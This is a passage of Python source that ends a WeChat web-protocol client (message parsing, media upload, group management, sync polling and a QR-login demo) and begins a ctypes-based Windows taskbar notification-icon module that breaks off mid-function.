            elif contact['UserName'].startswith(WeChatMeta.GROUP_PREFIX):
                if contact['MemberList']:
                    c = Contact(contact, self)
                    self.save_group(c)
                else:
                    # Empty member list: fetch the full group remotely.
                    self.save_group(self._query_entity(user))
            else:
                self.friends[user] = contact

    def get_avatar(self, user_id):
        params = {
            'username': user_id,
            'seq': int(time.time() * 4.36),  # 4.36:
magic number by myself 'skey': self.login_info['skey'], } if user_id.startswith(WeChatMeta.GROUP_PREFIX): path = WeChatMeta.URL['group_avatar'] else: path = WeChatMeta.URL['user_avatar'] url = self.login_info['main_uri'] + path resp = self.session.get(url, params=params) return resp.content def get_avatar_md5(self, user_id): return hashlib.md5(self.get_avatar(user_id)).hexdigest() ################## # handle message # ################## def _process_new_message(self, messages): for msg in messages: try: msg = self._reform_raw_msg(msg) if msg: self._run_callback(self.message_callback, msg) except Exception: logger.exception('Failed process raw message') def _handle_private_msg(self, msg): # TODO: implement pass def _handle_group_msg(self, from_user, to_user): group = self.get_group_by_username(to_user) if not group or from_user not in group.members: print('from', from_user, 'to', to_user, 'group', group) raise MessageDataCorruptionError user = group.members[from_user] return { 'from_user': from_user, 'from_nickname': user.display_name or user.nickname, 'to_user': to_user, 'to_nickname': group.nickname, } def _handle_initialize_msg(self, msg): users = msg['StatusNotifyUserName'].split(',') group_ids = [u for u in users if u.startswith(WeChatMeta.GROUP_PREFIX)] for group in self._query_entities(group_ids): self.save_group(group) def _handle_system_msg(self, msg, to_user): invite = WeChatMeta.RE['invite'].search(msg['Content']) if not invite: return {} group = self.get_group_by_username(to_user, force_remote=True) if not group: return {} new = { 'invitee': '', 'member_count': len(group.members), 'invitee_nickname': invite.group('invitee1') or \ invite.group('invitee2'), } for member_id, member in group.members.items(): display_name = member.display_name or member.nickname if display_name == new['invitee_nickname']: new['invitee'] = member_id break return {'new_member': new} def _reform_raw_msg(self, raw_msg): msg_type = raw_msg.get('MsgType') if msg_type == 
MESSAGE_TYPE.INITIALIZE: self._handle_initialize_msg(raw_msg) return try: content_type = MESSAGE_TYPE[msg_type].lower() except KeyError: content_type = 'other' new_msg = { 'is_at_me': False, 'message_type': 'private', 'content': raw_msg['Content'], 'new_member': None, 'content_type': content_type, } to_user, from_user = raw_msg['ToUserName'], raw_msg['FromUserName'] if from_user.startswith(WeChatMeta.GROUP_PREFIX): to_user, from_user = from_user, to_user if not to_user.startswith(WeChatMeta.GROUP_PREFIX): self._handle_private_msg(raw_msg) return None else: new_msg['message_type'] = 'group' if msg_type == MESSAGE_TYPE.TEXT: content = raw_msg['Content'] matched = WeChatMeta.RE['group_msg'].search(content) if matched: new_msg['content'] = matched.group('content') from_user = matched.group('username') me = self.get_group_member(to_user, self.username) or {} my_nickname = me.display_name or self.nickname if matched.group('nickname') == my_nickname: new_msg['is_at_me'] = True elif msg_type == MESSAGE_TYPE.SYSTEM: new_msg.update(self._handle_system_msg(raw_msg, to_user)) new_msg.update(self._handle_group_msg(from_user, to_user)) return new_msg ############ # Callback # ############ @classmethod def _run_callback(cls, callbacks, *args, **kwargs): if isinstance(callbacks, dict): callbacks = callbacks.values() for cb in callbacks: try: cb(*args, **kwargs) except Exception as err: logger.error('Failed run callback {}, args: {}, kwargs: ' '{}, error: {}'.format(cb, args, kwargs, err)) def save_credential(self): for cb in self.credential_update_callback: cb(self.uin, self.export_credential()) def register_credential_update_callback(self, callback, *args, **kwargs): self.credential_update_callback.append( functools.partial(callback, *args, **kwargs)) ################ # Send message # ################ def _upload_media_by_url(self, url, media_type, to_user): resp = requests.get(url) file_size = len(resp.content) file_md5 = hashlib.md5(resp.content).hexdigest() file_type = 
mimetypes.guess_type(url)[0] or \ 'application/octet-stream' upload_media_request = json.dumps(OrderedDict([ ('UploadType', 2), ('BaseRequest', self.login_info['base_request']), ('ClientMediaId', int(time.time() * 1e4)), ('TotalLen', file_size), ('StartPos', 0), ('DataLen', file_size), ('MediaType', 4), ('FromUserName', self.username), ('ToUserName', to_user), ('FileMd5', file_md5), ]), separators=(',', ':')) result = None params = {'f': 'json'} chunks = (file_size - 1) // self.CHUNK_SIZE + 1 last_chunk = 0 for chunk in range(1, chunks+1): last_modified = time.strftime(WeChatMeta.TIME_FORMAT) data_ticket = self.session.cookies.get( 'webwx_data_ticket', domain=WeChatMeta.COOKIE_DOMAIN ) chunk_data = resp.content[self.CHUNK_SIZE * last_chunk: self.CHUNK_SIZE * chunk] files = OrderedDict([ ('id', (None, 'WU_FILE_0')), ('name', (None, os.path.basename(url))), ('type', (None, file_type)), ('lastModifiedDate', (None, last_modified)), ('size', (None, str(file_size))), ('mediatype', (None, media_type)), ('uploadmediarequest', (None, upload_media_request)), ('webwx_data_ticket', (None, data_ticket)), ('pass_ticket', (None, self.login_info['pass_ticket'])), ('filename', (os.path.basename(url), chunk_data, file_type)) ]) last_chunk = chunk if chunks != 1: files['chunk'] = (None, str(chunk)) files['chunks'] = (None, str(chunks)) upload_url = self.login_info['upload_uri'] + \ WeChatMeta.URL['upload_media'] resp = self.session.post(upload_url, params=params, files=files) try: result = resp.json()['MediaId'] except (TypeError, ValueError): result = None return result def _send(self, to_user, msg_type, url, content=None, media_id=None): params = { 'fun': 'async', 'f': 'json', 'pass_ticket': self.login_info['pass_ticket'], } timestamp = int(time.time() * 1e4) current_user = self.username data = { 'BaseRequest': self.login_info['base_request'], 'Scene': 0, 'Msg': { 'Type': msg_type, 'Content': content, 'MediaId': media_id, 'FromUserName': current_user, 'ToUserName': to_user if 
to_user else current_user, 'LocalID': timestamp, 'ClientMsgId': timestamp, } } resp = self.session.post( url, params=params, data=json.dumps(data, ensure_ascii=False).encode('utf8') ) return self._decode_content(resp.content) def send_message(self, to_user, msg_type, payload=None, media_id=None): to_user = self._handle_group_id(to_user) or to_user assert payload or media_id, \ 'Requires at least one argument of payload and media_id' try: msg_type = getattr(MESSAGE_TYPE, msg_type.upper()) except KeyError: raise ValueError('Unsupported message type: {}'.format(msg_type)) if msg_type == MESSAGE_TYPE.TEXT: url = self.login_info['main_uri'] + WeChatMeta.URL['send_message'] result = self._send(to_user, msg_type, url, content=payload) return result['BaseResponse']['Ret'] == 0 if msg_type == MESSAGE_TYPE.IMAGE: media_type = 'pic' path = WeChatMeta.URL['send_image'] elif msg_type == MESSAGE_TYPE.VIDEO: media_type = 'video' path = WeChatMeta.URL['send_video'] elif msg_type == MESSAGE_TYPE.FILE: media_type = 'doc' path = WeChatMeta.URL['send_file'] else: raise ValueError('Unsupported message type: {}'.format(msg_type)) media_id = self._upload_media_by_url(payload, media_type, to_user) assert media_id, 'Failed upload file: {}'.format(payload) url = self.login_info['main_uri'] + path if msg_type == MESSAGE_TYPE.FILE: content = self._build_file_message_content(payload, media_id) media_id = None else: content = None result = self._send(to_user, msg_type, url, media_id=media_id, content=content) return result['BaseResponse']['Ret'] == 0 @staticmethod def _build_file_message_content(file_path, media_id): return WeChatMeta.FILE_MESSAGE_TEMPLATE.format( os.path.basename(file_path), str(os.path.getsize(file_path)), media_id, os.path.splitext(file_path)[1].replace('.', ''), ) ################# # Group manager # ################# def _handle_group_id(self, group_id): if group_id.startswith(WeChatMeta.GROUP_PREFIX): return group_id group = self.get_group_by_nickname(group_id) return 
group.user_id if group else None def del_group_member(self, group_id, member_ids): url = self.login_info['main_uri'] + WeChatMeta.URL['update_group'] params = { 'fun': 'delmember', 'pass_ticket': self.login_info['pass_ticket'], } data = { 'BaseRequest': self.login_info['base_request'], 'ChatRoomName': group_id, 'DelMemberList': ','.join(member_ids), } resp = self.session.post(url, params=params, json=data) self.save_group(self._query_entity(group_id)) return resp.json()['BaseResponse']['Ret'] == 0 def update_group_nickname(self, group_id, nickname): username = self._handle_group_id(group_id) if not username: logger.error('Failed update group nickname,' ' invalid group_id: {}'.format(group_id)) return False url = self.login_info['main_uri'] + WeChatMeta.URL['update_group'] params = { 'fun': 'modtopic', 'pass_ticket': self.login_info['pass_ticket'], } data = { 'BaseRequest': self.login_info['base_request'], 'ChatRoomName': username, 'NewTopic': nickname, } resp = self.session.post( url, params=params, data=json.dumps(data, ensure_ascii=False).encode('utf8', 'ignore'), ) self.save_group(self._query_entity(username)) return resp.json()['BaseResponse']['Ret'] == 0 def add_group_number(self, group_id, member_list): username = self._handle_group_id(group_id) if not username or username not in self.groups: logger.error('Failed delete group members,' ' invalid group_id: {}'.format(group_id)) return False url = self.login_info['main_uri'] + WeChatMeta.URL['update_group'] params = {'pass_ticket': self.login_info['pass_ticket']} data = { 'BaseRequest': self.login_info['base_request'], 'ChatRoomName': username, } members = ','.join(member_list) group = self.groups.get(username) if len(group.members) > self.invite_start_count: params['fun'] = 'invitemember' data['InviteMemberList'] = members else: params['fun'] = 'addmember' data['AddMemberList'] = members resp = self.session.post(url, params=params, json=data) self.save_group(self._query_entity(username)) return 
resp.json()['BaseResponse']['Ret'] == 0 def create_group(self, member_list, name=''): """ :param member_list: member username list :param name: group name :return: group info dict """ url = self.login_info['main_uri'] + WeChatMeta.URL['create_group'] params = { 'pass_ticket': self.login_info['pass_ticket'], 'r': int(time.time()), } data = { 'BaseRequest': self.login_info['base_request'], 'MemberCount': len(member_list), 'MemberList': [{'UserName': member} for member in member_list], 'Topic': name, } resp = self.session.post( url, params=params, data=json.dumps(data, ensure_ascii=False).encode('utf8', 'ignore') ) result = resp.json() if not result['BaseResponse']['Ret'] == 0: return None else: username = result['ChatRoomName'] self.send_message(username, 'text', 'Everyone welcome!') self._get_initialize_contacts() return username ################## # Listen message # ################## def listen_message(self, retries=3, thread=True): def fetch_event(): _, messages, contacts = self._fetch_server_change() self._process_new_message(messages) self._process_contacts_change(contacts) def receive_loop(_retries): fetch_event() while self._alive: self._run_callback(self.tick_hooks, self) try: check_data = self._sync_check() if check_data > 0: fetch_event() elif check_data == 0: _retries = retries elif _retries > 0: _retries -= 1 else: return self.logout() time.sleep(1) except (requests.ConnectionError, requests.Timeout, requests.HTTPError) as err: logger.error('Error in listen thread: {}'.format(err)) if self.listening: return self.listening = True if not thread: return receive_loop(retries) if self._listen_thread: raise MultiListenThreadError self.listen_thread = threading.Thread(target=receive_loop, args=(retries,)) self.listen_thread.setDaemon(True) self.listen_thread.start() def _fetch_server_change(self): url = self.login_info['main_uri'] + WeChatMeta.URL['web_sync'] params = { 'sid': self.login_info['wxsid'], 'skey': self.login_info['skey'], 'pass_ticket': 
self.login_info['pass_ticket'],
        }
        data = {
            'BaseRequest': self.login_info['base_request'],
            'SyncKey': self.login_info['sync_check_key'],
            # Bitwise-NOT of the timestamp: the protocol's "rr" nonce.
            'rr': ~int(time.time()),
        }
        resp = self.session.post(url, params=params, json=data)
        result = self._decode_content(resp.content)
        self.login_info['sync_check_key'] = result['SyncCheckKey']
        # synckey is the "Key_Val|Key_Val|..." form synccheck polling needs.
        self.login_info['synckey'] = '|'.join([
            '{}_{}'.format(item['Key'], item['Val'])
            for item in result['SyncCheckKey']['List']
        ])
        self.save_credential()
        success = result['BaseResponse']['Ret'] == 0
        return success, result['AddMsgList'], result['ModContactList']

    def _sync_check(self):
        """Poll synccheck; return the selector (>0: new events) or -1."""
        url = self.login_info['web_sync_uri'] + WeChatMeta.URL['sync_check']
        timestamp = int(time.time() * 1000)
        params = {
            'r': timestamp,
            'skey': self.login_info['skey'],
            'sid': self.login_info['wxsid'],
            'uin': self.login_info['wxuin'],
            'deviceid': self.login_info['deviceid'],
            'synckey': self.login_info['synckey'],
            '_': timestamp,
        }
        resp = self.session.get(url, params=params)
        matched = WeChatMeta.RE['sync_check'].search(resp.text)
        if not matched or matched.group('retcode') != '0':
            logger.debug('unexpected sync check result')
            return -1
        else:
            return int(matched.group('selector'))

    ###################
    # other operation #
    ###################
    def set_pin(self, username, pin=True):
        """Pin (or unpin) a conversation; True on server Ret == 0."""
        url = self.login_info['main_uri'] + WeChatMeta.URL['set_pin']
        params = {
            'pass_ticket': self.login_info['pass_ticket'],
            'lang': 'zh_CN',
        }
        data = {
            'UserName': username,
            'CmdId': 3,
            'OP': int(pin),
            'RemarkName': '',
            'BaseRequest': self.login_info['base_request'],
        }
        resp = self.session.post(url, params=params, json=data)
        return resp.json()['BaseResponse']['Ret'] == 0

    @staticmethod
    def _decode_content(content):
        # Server responses are UTF-8; replace undecodable bytes defensively.
        return json.loads(content.decode('utf-8', 'replace'))


class WeChatUnitTest(unittest.TestCase):
    # Network smoke test: the login-uuid endpoint must return a str uuid.
    def test_get_login_uuid(self):
        uuid = WeChatClient.get_login_uuid()
        self.assertIsInstance(uuid, str)


class WeChatDemo(object):
    """Interactive demo: QR login, then pretty-print every message."""

    def __init__(self):
        self.client = WeChatClient()

    @staticmethod
    def msg_callback(msg):
        pprint(msg)

    def run(self):
        client = self.client
        client.message_callback = [self.msg_callback]
        client.print_cli_qrcode()
        client.login_by_qrcode(timeout=120)
        print('Nickname: {}\n'
              'Username: {}\n'
              'Uin: {}\n'
              'alias: {}\n'
              'Time: {}\n'
              'Main Uri: {}\n'
              .format(client.nickname, client.username, client.uin,
                      client.alias, time.ctime(),
                      client.login_info['main_uri'])
              )
        client.listen_message(thread=False)
        while True:
            logger.info('Waiting for event...')
            time.sleep(30)


if __name__ == '__main__':
    WeChatDemo().run()
# notificationicon.py
# Pure ctypes windows taskbar notification icon # via https://gist.github.com/jasonbot/5759510 import ctypes import ctypes.wintypes import os import uuid import time import gevent import threading try: from queue import Empty as queue_Empty # Python 3 except ImportError: from Queue import Empty as queue_Empty # Python 2 __all__ = ['NotificationIcon'] # Create popup menu CreatePopupMenu = ctypes.windll.user32.CreatePopupMenu CreatePopupMenu.restype = ctypes.wintypes.HMENU CreatePopupMenu.argtypes = [] MF_BYCOMMAND = 0x0 MF_BYPOSITION = 0x400 MF_BITMAP = 0x4 MF_CHECKED = 0x8 MF_DISABLED = 0x2 MF_ENABLED = 0x0 MF_GRAYED = 0x1 MF_MENUBARBREAK = 0x20 MF_MENUBREAK = 0x40 MF_OWNERDRAW = 0x100 MF_POPUP = 0x10 MF_SEPARATOR = 0x800 MF_STRING = 0x0 MF_UNCHECKED = 0x0 InsertMenu = ctypes.windll.user32.InsertMenuW InsertMenu.restype = ctypes.wintypes.BOOL InsertMenu.argtypes = [ctypes.wintypes.HMENU, ctypes.wintypes.UINT, ctypes.wintypes.UINT, ctypes.wintypes.UINT, ctypes.wintypes.LPCWSTR] AppendMenu = ctypes.windll.user32.AppendMenuW AppendMenu.restype = ctypes.wintypes.BOOL AppendMenu.argtypes = [ctypes.wintypes.HMENU, ctypes.wintypes.UINT, ctypes.wintypes.UINT, ctypes.wintypes.LPCWSTR] SetMenuDefaultItem = ctypes.windll.user32.SetMenuDefaultItem SetMenuDefaultItem.restype = ctypes.wintypes.BOOL SetMenuDefaultItem.argtypes = [ctypes.wintypes.HMENU, ctypes.wintypes.UINT, ctypes.wintypes.UINT] class POINT(ctypes.Structure): _fields_ = [ ('x', ctypes.wintypes.LONG), ('y', ctypes.wintypes.LONG)] GetCursorPos = ctypes.windll.user32.GetCursorPos GetCursorPos.argtypes = [ctypes.POINTER(POINT)] SetForegroundWindow = ctypes.windll.user32.SetForegroundWindow SetForegroundWindow.argtypes = [ctypes.wintypes.HWND] TPM_LEFTALIGN = 0x0 TPM_CENTERALIGN = 0x4 TPM_RIGHTALIGN = 0x8 TPM_TOPALIGN = 0x0 TPM_VCENTERALIGN = 0x10 TPM_BOTTOMALIGN = 0x20 TPM_NONOTIFY = 0x80 TPM_RETURNCMD = 0x100 TPM_LEFTBUTTON = 0x0 TPM_RIGHTBUTTON = 0x2 TPM_HORNEGANIMATION = 0x800 TPM_HORPOSANIMATION = 0x400 
TPM_NOANIMATION = 0x4000 TPM_VERNEGANIMATION = 0x2000 TPM_VERPOSANIMATION = 0x1000 TrackPopupMenu = ctypes.windll.user32.TrackPopupMenu TrackPopupMenu.restype = ctypes.wintypes.BOOL TrackPopupMenu.argtypes = [ctypes.wintypes.HMENU, ctypes.wintypes.UINT, ctypes.c_int, ctypes.c_int, ctypes.c_int, ctypes.wintypes.HWND, ctypes.c_void_p] PostMessage = ctypes.windll.user32.PostMessageW PostMessage.restype = ctypes.wintypes.BOOL PostMessage.argtypes = [ctypes.wintypes.HWND, ctypes.wintypes.UINT, ctypes.wintypes.WPARAM, ctypes.wintypes.LPARAM] DestroyMenu = ctypes.windll.user32.DestroyMenu DestroyMenu.restype = ctypes.wintypes.BOOL DestroyMenu.argtypes = [ctypes.wintypes.HMENU] # Create notification icon GUID = ctypes.c_ubyte * 16 class TimeoutVersionUnion(ctypes.Union): _fields_ = [('uTimeout', ctypes.wintypes.UINT), ('uVersion', ctypes.wintypes.UINT),] NIS_HIDDEN = 0x1 NIS_SHAREDICON = 0x2 class NOTIFYICONDATA(ctypes.Structure): def __init__(self, *args, **kwargs): super(NOTIFYICONDATA, self).__init__(*args, **kwargs) self.cbSize = ctypes.sizeof(self) _fields_ = [ ('cbSize', ctypes.wintypes.DWORD), ('hWnd', ctypes.wintypes.HWND), ('uID', ctypes.wintypes.UINT), ('uFlags', ctypes.wintypes.UINT), ('uCallbackMessage', ctypes.wintypes.UINT), ('hIcon', ctypes.wintypes.HICON), ('szTip', ctypes.wintypes.WCHAR * 64), ('dwState', ctypes.wintypes.DWORD), ('dwStateMask', ctypes.wintypes.DWORD), ('szInfo', ctypes.wintypes.WCHAR * 256), ('union', TimeoutVersionUnion), ('szInfoTitle', ctypes.wintypes.WCHAR * 64), ('dwInfoFlags', ctypes.wintypes.DWORD), ('guidItem', GUID), ('hBalloonIcon', ctypes.wintypes.HICON), ] NIM_ADD = 0 NIM_MODIFY = 1 NIM_DELETE = 2 NIM_SETFOCUS = 3 NIM_SETVERSION = 4 NIF_MESSAGE = 1 NIF_ICON = 2 NIF_TIP = 4 NIF_STATE = 8 NIF_INFO = 16 NIF_GUID = 32 NIF_REALTIME = 64 NIF_SHOWTIP = 128 NIIF_NONE = 0 NIIF_INFO = 1 NIIF_WARNING = 2 NIIF_ERROR = 3 NIIF_USER = 4 NOTIFYICON_VERSION = 3 NOTIFYICON_VERSION_4 = 4 Shell_NotifyIcon = ctypes.windll.shell32.Shell_NotifyIconW 
Shell_NotifyIcon.restype = ctypes.wintypes.BOOL Shell_NotifyIcon.argtypes = [ctypes.wintypes.DWORD, ctypes.POINTER(NOTIFYICONDATA)] # Load icon/image IMAGE_BITMAP = 0 IMAGE_ICON = 1 IMAGE_CURSOR = 2 LR_CREATEDIBSECTION = 0x00002000 LR_DEFAULTCOLOR = 0x00000000 LR_DEFAULTSIZE = 0x00000040 LR_LOADFROMFILE = 0x00000010 LR_LOADMAP3DCOLORS = 0x00001000 LR_LOADTRANSPARENT = 0x00000020 LR_MONOCHROME = 0x00000001 LR_SHARED = 0x00008000 LR_VGACOLOR = 0x00000080 OIC_SAMPLE = 32512 OIC_HAND = 32513 OIC_QUES = 32514 OIC_BANG = 32515 OIC_NOTE = 32516 OIC_WINLOGO = 32517 OIC_WARNING = OIC_BANG OIC_ERROR = OIC_HAND OIC_INFORMATION = OIC_NOTE LoadImage = ctypes.windll.user32.LoadImageW LoadImage.restype = ctypes.wintypes.HANDLE LoadImage.argtypes = [ctypes.wintypes.HINSTANCE, ctypes.wintypes.LPCWSTR, ctypes.wintypes.UINT, ctypes.c_int, ctypes.c_int, ctypes.wintypes.UINT] # CreateWindow call WNDPROC = ctypes.WINFUNCTYPE(ctypes.c_int, ctypes.wintypes.HWND, ctypes.c_uint, ctypes.wintypes.WPARAM, ctypes.wintypes.LPARAM) DefWindowProc = ctypes.windll.user32.DefWindowProcW DefWindowProc.restype = ctypes.c_int DefWindowProc.argtypes = [ctypes.wintypes.HWND, ctypes.c_uint, ctypes.wintypes.WPARAM, ctypes.wintypes.LPARAM] WS_OVERLAPPED = 0x00000000L WS_POPUP = 0x80000000L WS_CHILD = 0x40000000L WS_MINIMIZE = 0x20000000L WS_VISIBLE = 0x10000000L WS_DISABLED = 0x08000000L WS_CLIPSIBLINGS = 0x04000000L WS_CLIPCHILDREN = 0x02000000L WS_MAXIMIZE = 0x01000000L WS_CAPTION = 0x00C00000L WS_BORDER = 0x00800000L WS_DLGFRAME = 0x00400000L WS_VSCROLL = 0x00200000L WS_HSCROLL = 0x00100000L WS_SYSMENU = 0x00080000L WS_THICKFRAME = 0x00040000L WS_GROUP = 0x00020000L WS_TABSTOP = 0x00010000L WS_MINIMIZEBOX = 0x00020000L WS_MAXIMIZEBOX = 0x00010000L WS_OVERLAPPEDWINDOW = (WS_OVERLAPPED | WS_CAPTION | WS_SYSMENU | WS_THICKFRAME | WS_MINIMIZEBOX | WS_MAXIMIZEBOX) SM_XVIRTUALSCREEN = 76 SM_YVIRTUALSCREEN = 77 SM_CXVIRTUALSCREEN = 78 SM_CYVIRTUALSCREEN = 79 SM_CMONITORS = 80 SM_SAMEDISPLAYFORMAT = 81 WM_NULL = 
0x0000 WM_CREATE = 0x0001 WM_DESTROY = 0x0002 WM_MOVE = 0x0003 WM_SIZE = 0x0005 WM_ACTIVATE = 0x0006 WM_SETFOCUS = 0x0007 WM_KILLFOCUS = 0x0008 WM_ENABLE = 0x000A WM_SETREDRAW = 0x000B WM_SETTEXT = 0x000C WM_GETTEXT = 0x000D WM_GETTEXTLENGTH = 0x000E WM_PAINT = 0x000F WM_CLOSE = 0x0010 WM_QUERYENDSESSION = 0x0011 WM_QUIT = 0x0012 WM_QUERYOPEN = 0x0013 WM_ERASEBKGND = 0x0014 WM_SYSCOLORCHANGE = 0x0015 WM_ENDSESSION = 0x0016 WM_SHOWWINDOW = 0x0018 WM_CTLCOLOR = 0x0019 WM_WININICHANGE = 0x001A WM_SETTINGCHANGE = 0x001A WM_DEVMODECHANGE = 0x001B WM_ACTIVATEAPP = 0x001C WM_FONTCHANGE = 0x001D WM_TIMECHANGE = 0x001E WM_CANCELMODE = 0x001F WM_SETCURSOR = 0x0020 WM_MOUSEACTIVATE = 0x0021 WM_CHILDACTIVATE = 0x0022 WM_QUEUESYNC = 0x0023 WM_GETMINMAXINFO = 0x0024 WM_PAINTICON = 0x0026 WM_ICONERASEBKGND = 0x0027 WM_NEXTDLGCTL = 0x0028 WM_SPOOLERSTATUS = 0x002A WM_DRAWITEM = 0x002B WM_MEASUREITEM = 0x002C WM_DELETEITEM = 0x002D WM_VKEYTOITEM = 0x002E WM_CHARTOITEM = 0x002F WM_SETFONT = 0x0030 WM_GETFONT = 0x0031 WM_SETHOTKEY = 0x0032 WM_GETHOTKEY = 0x0033 WM_QUERYDRAGICON = 0x0037 WM_COMPAREITEM = 0x0039 WM_GETOBJECT = 0x003D WM_COMPACTING = 0x0041 WM_COMMNOTIFY = 0x0044 WM_WINDOWPOSCHANGING = 0x0046 WM_WINDOWPOSCHANGED = 0x0047 WM_POWER = 0x0048 WM_COPYDATA = 0x004A WM_CANCELJOURNAL = 0x004B WM_NOTIFY = 0x004E WM_INPUTLANGCHANGEREQUEST = 0x0050 WM_INPUTLANGCHANGE = 0x0051 WM_TCARD = 0x0052 WM_HELP = 0x0053 WM_USERCHANGED = 0x0054 WM_NOTIFYFORMAT = 0x0055 WM_CONTEXTMENU = 0x007B WM_STYLECHANGING = 0x007C WM_STYLECHANGED = 0x007D WM_DISPLAYCHANGE = 0x007E WM_GETICON = 0x007F WM_SETICON = 0x0080 WM_NCCREATE = 0x0081 WM_NCDESTROY = 0x0082 WM_NCCALCSIZE = 0x0083 WM_NCHITTEST = 0x0084 WM_NCPAINT = 0x0085 WM_NCACTIVATE = 0x0086 WM_GETDLGCODE = 0x0087 WM_SYNCPAINT = 0x0088 WM_NCMOUSEMOVE = 0x00A0 WM_NCLBUTTONDOWN = 0x00A1 WM_NCLBUTTONUP = 0x00A2 WM_NCLBUTTONDBLCLK = 0x00A3 WM_NCRBUTTONDOWN = 0x00A4 WM_NCRBUTTONUP = 0x00A5 WM_NCRBUTTONDBLCLK = 0x00A6 WM_NCMBUTTONDOWN = 0x00A7 
WM_NCMBUTTONUP = 0x00A8 WM_NCMBUTTONDBLCLK = 0x00A9 WM_KEYDOWN = 0x0100 WM_KEYUP = 0x0101 WM_CHAR = 0x0102 WM_DEADCHAR = 0x0103 WM_SYSKEYDOWN = 0x0104 WM_SYSKEYUP = 0x0105 WM_SYSCHAR = 0x0106 WM_SYSDEADCHAR = 0x0107 WM_KEYLAST = 0x0108 WM_IME_STARTCOMPOSITION = 0x010D WM_IME_ENDCOMPOSITION = 0x010E WM_IME_COMPOSITION = 0x010F WM_IME_KEYLAST = 0x010F WM_INITDIALOG = 0x0110 WM_COMMAND = 0x0111 WM_SYSCOMMAND = 0x0112 WM_TIMER = 0x0113 WM_HSCROLL = 0x0114 WM_VSCROLL = 0x0115 WM_INITMENU = 0x0116 WM_INITMENUPOPUP = 0x0117 WM_MENUSELECT = 0x011F WM_MENUCHAR = 0x0120 WM_ENTERIDLE = 0x0121 WM_MENURBUTTONUP = 0x0122 WM_MENUDRAG = 0x0123 WM_MENUGETOBJECT = 0x0124 WM_UNINITMENUPOPUP = 0x0125 WM_MENUCOMMAND = 0x0126 WM_CTLCOLORMSGBOX = 0x0132 WM_CTLCOLOREDIT = 0x0133 WM_CTLCOLORLISTBOX = 0x0134 WM_CTLCOLORBTN = 0x0135 WM_CTLCOLORDLG = 0x0136 WM_CTLCOLORSCROLLBAR = 0x0137 WM_CTLCOLORSTATIC = 0x0138 WM_MOUSEMOVE = 0x0200 WM_LBUTTONDOWN = 0x0201 WM_LBUTTONUP = 0x0202 WM_LBUTTONDBLCLK = 0x0203 WM_RBUTTONDOWN = 0x0204 WM_RBUTTONUP = 0x0205 WM_RBUTTONDBLCLK = 0x0206 WM_MBUTTONDOWN = 0x0207 WM_MBUTTONUP = 0x0208 WM_MBUTTONDBLCLK = 0x0209 WM_MOUSEWHEEL = 0x020A WM_PARENTNOTIFY = 0x0210 WM_ENTERMENULOOP = 0x0211 WM_EXITMENULOOP = 0x0212 WM_NEXTMENU = 0x0213 WM_SIZING = 0x0214 WM_CAPTURECHANGED = 0x0215 WM_MOVING = 0x0216 WM_DEVICECHANGE = 0x0219 WM_MDICREATE = 0x0220 WM_MDIDESTROY = 0x0221 WM_MDIACTIVATE = 0x0222 WM_MDIRESTORE = 0x0223 WM_MDINEXT = 0x0224 WM_MDIMAXIMIZE = 0x0225 WM_MDITILE = 0x0226 WM_MDICASCADE = 0x0227 WM_MDIICONARRANGE = 0x0228 WM_MDIGETACTIVE = 0x0229 WM_MDISETMENU = 0x0230 WM_ENTERSIZEMOVE = 0x0231 WM_EXITSIZEMOVE = 0x0232 WM_DROPFILES = 0x0233 WM_MDIREFRESHMENU = 0x0234 WM_IME_SETCONTEXT = 0x0281 WM_IME_NOTIFY = 0x0282 WM_IME_CONTROL = 0x0283 WM_IME_COMPOSITIONFULL = 0x0284 WM_IME_SELECT = 0x0285 WM_IME_CHAR = 0x0286 WM_IME_REQUEST = 0x0288 WM_IME_KEYDOWN = 0x0290 WM_IME_KEYUP = 0x0291 WM_MOUSEHOVER = 0x02A1 WM_MOUSELEAVE = 0x02A3 WM_CUT = 0x0300 WM_COPY = 0x0301 
# Clipboard / palette / remaining message identifiers (winuser.h values).
WM_PASTE = 0x0302
WM_CLEAR = 0x0303
WM_UNDO = 0x0304
WM_RENDERFORMAT = 0x0305
WM_RENDERALLFORMATS = 0x0306
WM_DESTROYCLIPBOARD = 0x0307
WM_DRAWCLIPBOARD = 0x0308
WM_PAINTCLIPBOARD = 0x0309
WM_VSCROLLCLIPBOARD = 0x030A
WM_SIZECLIPBOARD = 0x030B
WM_ASKCBFORMATNAME = 0x030C
WM_CHANGECBCHAIN = 0x030D
WM_HSCROLLCLIPBOARD = 0x030E
WM_QUERYNEWPALETTE = 0x030F
WM_PALETTEISCHANGING = 0x0310
WM_PALETTECHANGED = 0x0311
WM_HOTKEY = 0x0312
WM_PRINT = 0x0317
WM_PRINTCLIENT = 0x0318
WM_HANDHELDFIRST = 0x0358
WM_HANDHELDLAST = 0x035F
WM_AFXFIRST = 0x0360
WM_AFXLAST = 0x037F
WM_PENWINFIRST = 0x0380
WM_PENWINLAST = 0x038F
WM_APP = 0x8000
WM_USER = 0x0400
# App-private message id used to reflect notifications back to this window.
WM_REFLECT = WM_USER + 0x1c00


class WNDCLASSEX(ctypes.Structure):
    """ctypes mirror of the Win32 WNDCLASSEXW structure (window class
    registration).  cbSize is filled in automatically on construction, as
    RegisterClassExW requires it to hold the structure size."""

    def __init__(self, *args, **kwargs):
        super(WNDCLASSEX, self).__init__(*args, **kwargs)
        self.cbSize = ctypes.sizeof(self)

    # Field layout must match WNDCLASSEXW exactly; WNDPROC is defined
    # earlier in this module.
    _fields_ = [("cbSize", ctypes.c_uint),
                ("style", ctypes.c_uint),
                ("lpfnWndProc", WNDPROC),
                ("cbClsExtra", ctypes.c_int),
                ("cbWndExtra", ctypes.c_int),
                ("hInstance", ctypes.wintypes.HANDLE),
                ("hIcon", ctypes.wintypes.HANDLE),
                ("hCursor", ctypes.wintypes.HANDLE),
                ("hBrush", ctypes.wintypes.HANDLE),
                ("lpszMenuName", ctypes.wintypes.LPCWSTR),
                ("lpszClassName", ctypes.wintypes.LPCWSTR),
                ("hIconSm", ctypes.wintypes.HANDLE)]


# user32!ShowWindow binding (show/hide a window by handle).
ShowWindow = ctypes.windll.user32.ShowWindow
ShowWindow.argtypes = [ctypes.wintypes.HWND, ctypes.c_int]


def GenerateDummyWindow(callback, uid):
    """Register a throwaway window class named after *uid* and create an
    invisible (WS_POPUP, zero-sized) window whose window procedure is
    *callback*.  Returns the new window handle."""
    newclass = WNDCLASSEX()
    newclass.lpfnWndProc = callback
    # Class names may not contain '-', so strip them from the UUID string.
    newclass.lpszClassName = uid.replace("-", "")
    ATOM = ctypes.windll.user32.RegisterClassExW(ctypes.byref(newclass))
